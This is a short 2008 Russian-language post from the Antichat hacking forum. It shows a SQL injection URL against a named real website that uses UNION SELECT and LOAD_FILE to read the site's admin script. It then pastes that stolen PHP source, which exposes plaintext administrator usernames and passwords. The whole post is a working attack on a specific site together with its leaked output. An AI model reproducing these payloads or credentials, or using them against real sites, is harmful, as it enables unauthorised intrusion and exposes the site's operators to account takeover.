Показать сообщение отдельно

  #5932  
Старый 09.07.2008, 20:10
The matrix
Reservists Of Antichat - Level 6
Регистрация: 09.07.2008
Сообщений: 102
С нами: 9389186

Репутация: 573
По умолчанию

http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-1+union+select+1,LOAD_FILE(0x2f686f6d652f736974652 f68617264766973696f6e2e72752f7765622f61646d696e2f6 1646d696e2e70687033),3/*
В сорсах смотрим и вуля... Пароль хранится не в бд
PHP код:
<?php
if ($db=='news'){
        if (
$author =='Reg' && $password=='regulator'){include "news/formindexstart.php";}
        if (
$author=='Digit' && $password=='mityap'){include "news/formindexstart.php";}
        if (
$author=='Nitro' && $password=='asdbnmiop'){include "news/formindexstart.php";}
        if (
$author=='George' && $password=='dolin'){include "news/formindexstart.php";}
}
elseif (
$db=='files'){
        if (
$author=='Reg' && $password=='regulator'){include "files/formindex.php3";}
        if (
$author=='Gigit' && $password=='mityap'){include "files/formindex.php3";}
        if (
$author=='Nitro' && $password=='asdbnmiop'){include "files/formindex.php3";}
}
?>

Последний раз редактировалось The matrix; 09.07.2008 в 20:17..
 
Ответить с цитированием